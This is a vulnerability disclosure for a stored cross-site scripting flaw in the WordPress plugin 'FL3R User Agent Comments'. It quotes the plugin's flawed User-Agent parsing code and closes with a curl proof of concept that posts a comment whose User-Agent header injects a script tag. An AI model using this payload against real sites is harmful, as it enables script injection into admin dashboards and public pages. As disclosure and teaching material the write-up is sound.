The plugin FL3R User Agent Comments is vulnerable to a stored XSS attack that allows for arbitrary Javascript execution in the context of the admin dashboard, as well as injection into any page which displays comments.
The plugin generates small icon images that represent the HTTP User Agent associated with posted comments. By default, the plugin will create and display icons next to each comment in the comments admin page, the dashboard, and the public-facing post on which the comment was left, using the following pattern:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
require_once 'include/browser.php'; function display_user_agent($comment_text) { $plugin_url = plugins_url(plugin_basename( dirname( __FILE__ ))); global $comment; if(is_feed()) return $comment_text; $fuac_options = get_fuac_options(); $browser = new Browser($comment->comment_agent); if($fuac_options['general_show_unknown'] == 'true' and $browser->Name == "Unknown" and $browser->Platform == "Unknown") return $comment_text; if($fuac_options['post_show_browser'] != 'false') $fuac_string = '<img width="'.$fuac_options['post_icon_size'].'" height="'.$fuac_options['post_icon_size'].'" src="'.$plugin_url.'/images/browser/'.$browser->BrowserImage.'.png" alt="'.$browser->Name.' '.$browser->Version.'" title="'.$browser->Name.' '.$browser->Version.'"> '; if($fuac_options['post_show_platform'] != 'false') $fuac_string .= '<img width="'.$fuac_options['post_icon_size'].'" height="'.$fuac_options['post_icon_size'].'" src="'.$plugin_url.'/images/os/'.$browser->PlatformImage.'.png" alt="'.$browser->Platform.' '.$browser->Pver.'" title="'.$browser->Platform.' '.$browser->Pver.' '.$browser->Architecture.'">'; $commentID = get_comment_id(); $result = $fuac_options['post_location'] == 'pl_before' ? $fuac_string."\n\n" . $comment_text . "\n\n" : $comment_text."\n\n".$fuac_string; return $result; } |
The included file include/browser.php defines a PHP class that is used to construct an object representing several defining characteristics of an HTTP User Agent. The object contains several fields, including Name, Version, Platform, and Pver (platform version). User agent data is loaded from the wp-comments DB table; WordPress’ comment system does not perform any transformation of the User Agent header beyond generic SQL input sanitation, though it does limit stored values to 254 characters.
Object values are set using basic string parsing (stristr, stripos) based on the contents of the stored User Agent data, using this matching to build object keys based on a limited set of values. There is even what appears to be a token attempt at sanitization for values that have not yet been matched:
|
1 2 3 4 |
// clean up extraneous garbage that may be in the name $bd['browser'] = ereg_replace("[^a-z,A-Z,-]", "", $bd['browser']); // clean up extraneous garbage that may be in the version $bd['version'] = ereg_replace("[^0-9,.,a-z,A-Z]", "", $bd['version']); |
However, in some cases, the constructor uses a combination of explode and stripos to build several object values based on the raw contents of the User Agent header:
|
1 2 3 4 5 6 7 8 |
// fedora if(stripos($agent,'fedora')) { $val = explode(" ",stristr($agent,"fc")); $val = explode("fc",$val[0]); $bd['platform'] = 'Fedora '.$val[0]; $bd['pver'] = $val[1]; } |
Here$agent is the value of the comment_agent in the comment database record. This means its trivial to create a browser object with arbitrary $bd['platform'] and $bd['pver'] values, which are then assigned to the Browser object’s Platform and Pver keys, respectively. From here, those values will be interpolated directly into the comments admin page, dashboard, and post output.
Exploiting this is as simple as adding comment to any existing WordPress post with a malicious User Agent header. Javascript and HTML tags can be inserted in arbitrary fashion; exploiting the parsing of a Fedora UA is shown below:
|
1 2 3 4 |
$ curl 'https://www.example.com/wp-comments-post.php' \ -H $'User-Agent: xfedora fc"><script>alert(\'xss\')</script>' \ --data 'author=John&email=john%40doe.com&url=https%3A%2F%2Fwww.example.com%2F&comment=hello&submit=Post+Comment&comment_post_ID=389&comment_parent=0&akismet_comment_nonce=7792fcf92e&ak_js=1424779929831' \ --compressed |
A recent update was pushed that appears to resolve these issues.